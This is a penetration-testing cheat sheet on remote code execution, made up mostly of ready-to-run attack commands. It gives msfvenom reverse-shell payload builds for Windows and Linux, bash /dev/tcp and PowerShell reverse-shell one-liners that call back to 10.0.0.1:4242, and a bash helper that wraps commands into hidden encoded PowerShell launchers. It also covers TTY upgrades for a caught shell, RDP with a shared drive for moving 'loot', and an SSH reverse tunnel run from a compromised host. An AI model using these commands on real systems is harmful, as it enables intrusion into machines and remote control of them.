Remote Code Execution

Check list

msfvenom  --list encoders

Windows

  • File

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
  • Shell Code

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f py

Linux

  • File

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
  • Shell Code

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f py

Reverse Shell using bash

# needs bash itself: /dev/tcp is a bash feature, sh/dash do not have it; catch it with a listener on 10.0.0.1:4242
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Reverse Shell using PowerShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
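The one-liner above is awkward to pass through anything that does its own quoting (a web shell parameter, a scheduled task, an injected command line), and the usual fix is `powershell -EncodedCommand`, which takes base64 of the UTF-16LE bytes of the script, not of UTF-8. The following shell helper is an added example, not code from the original page: `ps_encode` produces that form for any PowerShell command (feed it the reverse-shell line or `"$(cat shell.ps1)"`), `ps_decode` reverses it so an encoded command found in a process list or log can be read before anything is run, and `ps_launcher` assembles the launcher line. The demo command is a constructed placeholder. Encoding only solves the quoting problem; AMSI and Defender see the decoded script, and an `iex`-based stager like the one above should be expected to trip them on a patched host.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): UTF-16LE + base64 wrapping for
# powershell.exe -EncodedCommand, plus the inverse for triage.
set -euo pipefail

# PowerShell -EncodedCommand base64-decodes the argument and reads the bytes as
# UTF-16LE. Plain base64 of UTF-8 text yields garbage on the Windows side.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Inverse: recover the script from an -enc blob (e.g. copied from a process
# listing) so it can be reviewed before anything is executed.
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Full launcher line. -nop, -w hidden and -enc are the standard abbreviations of
# -NoProfile, -WindowStyle and -EncodedCommand.
ps_launcher() {
    printf 'powershell -nop -w hidden -enc %s' "$1"
}

# Constructed placeholder; in practice this is the reverse-shell one-liner or
# the contents of a .ps1 file: ps_encode "$(cat shell.ps1)"
demo_cmd='Write-Output "stager goes here"; (Get-Location).Path'

main() {
    local enc
    enc="$(ps_encode "$demo_cmd")"
    echo "encoded : $enc"
    echo "launcher: $(ps_launcher "$enc")"
    echo "decoded : $(ps_decode "$enc")"
}

# Only run the demo when executed directly, not when sourced.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    main
fi
```

`ps_encode ls` yields `bABzAA==`, which is what `powershell -enc bABzAA==` needs to run `ls`; checking a suspicious blob is `ps_decode '<blob>'`.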

RDP

rdesktop $ip -u Tester -p <Pass>

# /drive:D,/tmp shares the local /tmp into the session as a drive named D (handy for moving tools and loot)
xfreerdp /f /u:Tester /p:<Pass> /v:192.168.0.101 /drive:D,/tmp

Upgrade shell

# in the reverse shell: get a pty, then background the shell with Ctrl-Z
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# on the attacker's own terminal, after Ctrl-Z: stop local line handling and bring the shell back
stty raw -echo; fg
# back in the remote shell (press Enter if the prompt does not come back); rows/cols from `stty size` in a local terminal
reset
stty rows <ROWS> cols <COLS>

Port Tunneling

https://www.ssh.com/ssh/tunneling/example

# run on the compromised host: exposes its local 127.0.0.1:8080 as $myip:8080 on the attacker box;
# binding to $myip instead of the attacker's loopback needs GatewayPorts yes in the attacker's sshd_config
ssh -R $myip:8080:127.0.0.1:8080 kali@$myip
